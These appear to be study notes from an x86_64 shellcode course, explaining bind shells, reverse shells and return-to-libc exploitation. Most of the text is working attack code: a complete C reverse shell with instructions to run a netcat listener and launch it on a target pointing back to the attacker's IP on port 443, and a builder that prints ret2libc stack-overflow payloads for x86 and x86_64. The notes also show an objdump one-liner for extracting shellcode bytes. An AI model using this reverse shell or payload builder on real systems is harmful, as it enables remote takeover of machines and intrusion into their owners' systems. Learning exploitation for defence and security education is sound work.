through with the basics, we will look at writing shellcode, encoders, decoders, crypters and other advanced low-level applications.
The course outline follows the exact same outline as our 32-bit course, but all the topics will be taught with x86_64 64-bit assembly.
Patch win86/64 PE and linux86/64 binaries with shellcode
An array of all x86/x86_64 instructions, very useful
# Extract the raw opcode bytes of an assembled object as a \x-escaped string (objdump fields are tab separated: address, bytes, mnemonic; printf avoids echo's shell-dependent handling of backslashes)
for i in $(objdump -d binary.o -M intel | grep "^ " | cut -f2); do printf '\\x%s' "$i"; done; echo
There are several ways to get a shell on a remote host over the network. The classic one is a bind shell: open a listening TCP socket on a known port, fork a shell and point its stdin/stdout/stderr at the accepted connection, so you can talk to it from your own machine with a plain netcat. In practice this often fails: most public-facing servers expose only a handful of ports (HTTP(S), FTP, SMTP and the like), and every other inbound connection is filtered and dropped by iptables or a perimeter firewall before it ever reaches your listener.
The usual answer is a reverse shell, which simply swaps the roles of client and server. With a bind shell you open a port on the target and wait for your attacking machine to connect in; with a reverse shell you open the listener on your own machine and make the target connect out to it, so the attacker becomes the receiver waiting for the victim to call home. Outbound traffic is rarely filtered as tightly as inbound, and listening on a port the target is already allowed to reach (443 is the common choice) makes the callback look like ordinary egress.
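The connect / dup2 / execve sequence described above, written out in C as an added example (this is not code from the linked page or its author). It is the same sequence a reverse-shell shellcode performs, which is why it is useful to have the plain-C version next to you when hand-writing the assembly. The loopback self-test, the command-line handling and the function names are all mine; it assumes a POSIX system with /bin/sh.

```c
// Added example: minimal reverse shell in C plus a loopback self-test.
// Assumptions (mine, not the page's): Linux/POSIX sockets, /bin/sh present.
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <unistd.h>

/* Victim side, step 1: connect back to the attacker's listener. Returns fd or -1. */
int reverse_connect(const char *ip, unsigned short port) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1) return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) { close(fd); return -1; }
    return fd;
}

/* Victim side, step 2: point stdin/stdout/stderr at the socket and replace the
   process with a shell. Only returns (with -1) if dup2 or execve fails. */
int spawn_shell_on(int fd, char *const argv[]) {
    for (int i = 0; i < 3; i++)
        if (dup2(fd, i) < 0) return -1;
    execve("/bin/sh", argv, NULL);
    return -1;
}

/* Loopback demo: the attacker side (listener) runs in this process, the victim
   side (connect back + dup2 + execve) in a forked child. Returns 1 on success.
   The child runs `sh -c 'echo ok'` instead of an interactive shell so the
   result can be checked automatically. */
int selftest(void) {
    int ls = socket(AF_INET, SOCK_STREAM, 0);
    if (ls < 0) return 0;
    struct timeval tv = { 5, 0 };                    /* don't hang forever in accept() */
    setsockopt(ls, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;                                 /* kernel picks a free port */
    socklen_t len = sizeof sa;
    if (bind(ls, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(ls, 1) < 0 ||
        getsockname(ls, (struct sockaddr *)&sa, &len) < 0) { close(ls); return 0; }
    unsigned short port = ntohs(sa.sin_port);

    pid_t pid = fork();
    if (pid < 0) { close(ls); return 0; }
    if (pid == 0) {                                  /* "victim" */
        close(ls);
        int fd = reverse_connect("127.0.0.1", port);
        if (fd < 0) _exit(1);
        char *const argv[] = { "sh", "-c", "echo ok", NULL };
        spawn_shell_on(fd, argv);
        _exit(1);
    }
    int c = accept(ls, NULL, NULL);                  /* "attacker" */
    close(ls);
    if (c < 0) { waitpid(pid, NULL, 0); return 0; }
    char buf[16];
    memset(buf, 0, sizeof buf);
    ssize_t n = read(c, buf, sizeof buf - 1);
    close(c);
    waitpid(pid, NULL, 0);
    return n == 3 && memcmp(buf, "ok\n", 3) == 0;
}

int main(int argc, char **argv) {
    if (argc == 3) {                                 /* ./revshell <ip> <port>: real reverse shell */
        int fd = reverse_connect(argv[1], (unsigned short)atoi(argv[2]));
        if (fd < 0) { perror("connect"); return 1; }
        char *const sh[] = { "/bin/sh", NULL };
        return spawn_shell_on(fd, sh);
    }
    printf("loopback self-test: %s\n", selftest() ? "ok" : "FAILED");
    return 0;
}
```

Run `nc -lvp 443` on the attacking host and `./revshell <attacker-ip> 443` on the target; with no arguments the program exercises the whole sequence against itself over 127.0.0.1. The order of operations (socket, connect, three dup2 calls, execve) maps one-to-one onto the syscalls the 64-bit shellcode has to issue.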
Return-to-libc (ret2libc) is a way of exploiting a stack buffer overflow on a system with a non-executable stack (NX/DEP). It works like a standard overflow in that the saved return address is overwritten with a location the attacker controls, but since nothing on the stack may be executed you cannot simply drop shellcode there and return into it. Instead the return address is pointed at code that is already executable, typically system() in libc, and the stack (or, on x86_64, the argument register loaded through a short gadget) is arranged so that system() receives a pointer to a "/bin/sh" string that libc already contains.
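The stack layout that makes this work, as an added example in C rather than anything from the linked page: a small builder that emits the 32-bit frame (system, its fake return address, then the argument) and the x86_64 variant, where the argument must go in rdi via a "pop rdi ; ret" gadget. Every address below (system, exit, "/bin/sh", the gadgets) and the 40/76-byte offsets are hypothetical placeholders I chose for illustration; on a real target they come from gdb, readelf or an information leak, and with ASLR they change per run.

```c
// Added example: lay out a return-to-libc payload for x86 and x86_64.
// All addresses and offsets in the demo functions are hypothetical.
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { ARCH_X86 = 32, ARCH_X86_64 = 64 };

struct ret2libc {
    size_t   offset;     /* bytes from the start of the buffer to the saved return address */
    uint64_t system;     /* &system in the target's libc */
    uint64_t exit_fn;    /* &exit: becomes system()'s return address so the process ends cleanly */
    uint64_t binsh;      /* &"/bin/sh" inside libc (system() itself references that string) */
    uint64_t pop_rdi;    /* x86_64 only: "pop rdi ; ret" gadget, loads the first argument */
    uint64_t ret_gadget; /* x86_64 only, optional: a lone "ret" to restore 16-byte stack
                            alignment before system() (else movaps in libc may fault); 0 = none */
};

/* Write v little-endian as `width` bytes (4 or 8) at out[pos]; returns new pos, 0 if it does not fit. */
static size_t put_word(unsigned char *out, size_t cap, size_t pos, uint64_t v, int width) {
    if (pos + (size_t)width > cap) return 0;
    for (int i = 0; i < width; i++) out[pos + i] = (unsigned char)(v >> (8 * i));
    return pos + (size_t)width;
}

/* Read a little-endian word back out of a built payload (for inspection). */
uint64_t get_word(const unsigned char *buf, size_t pos, int width) {
    uint64_t v = 0;
    for (int i = width - 1; i >= 0; i--) v = (v << 8) | buf[pos + i];
    return v;
}

/* Returns the payload length, or 0 on error. */
size_t build_ret2libc(unsigned char *out, size_t cap, const struct ret2libc *t, int arch) {
    if (t->offset > cap) return 0;
    memset(out, 'A', t->offset);                 /* filler up to the saved return address */
    size_t p = t->offset;
    if (arch == ARCH_X86) {
        /* cdecl: after `ret` into system(), the stack holds [return address][arg0] */
        p = put_word(out, cap, p, t->system, 4);
        if (p) p = put_word(out, cap, p, t->exit_fn, 4);
        if (p) p = put_word(out, cap, p, t->binsh, 4);
    } else if (arch == ARCH_X86_64) {
        /* SysV ABI: arg0 travels in rdi, so a gadget has to load it before we reach system() */
        if (t->ret_gadget) p = put_word(out, cap, p, t->ret_gadget, 8);
        if (p) p = put_word(out, cap, p, t->pop_rdi, 8);
        if (p) p = put_word(out, cap, p, t->binsh, 8);
        if (p) p = put_word(out, cap, p, t->system, 8);
    } else {
        return 0;
    }
    return p;
}

unsigned char payload[256];

/* Demo inputs: hypothetical addresses, 40-byte distance to the return address. */
size_t demo_x86_64(void) {
    struct ret2libc t = { 40, 0x7ffff7e50d70ULL, 0x7ffff7e38a40ULL, 0x7ffff7f9e5bdULL, 0x401203ULL, 0 };
    return build_ret2libc(payload, sizeof payload, &t, ARCH_X86_64);
}

/* Demo inputs: hypothetical 32-bit addresses, 76-byte distance to the return address. */
size_t demo_x86(void) {
    struct ret2libc t = { 76, 0xf7e0c850ULL, 0xf7dff480ULL, 0xf7f3a5f4ULL, 0, 0 };
    return build_ret2libc(payload, sizeof payload, &t, ARCH_X86);
}

/* Print as a \x-escaped literal, ready to feed to the target via printf or python. */
void print_payload(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++) printf("\\x%02x", buf[i]);
    putchar('\n');
}

int main(void) {
    print_payload(payload, demo_x86_64());
    print_payload(payload, demo_x86());
    return 0;
}
```

The 32-bit frame is the one most write-ups show: the overwritten return address "calls" system() by returning into it, so system() sees exit's address where it expects its own return address and the "/bin/sh" pointer as its first argument. On x86_64 the same call needs a gadget because arguments are passed in registers, which is the first step from pure ret2libc toward ROP; the optional ret gadget is the usual fix when system() crashes on a misaligned stack instead of running.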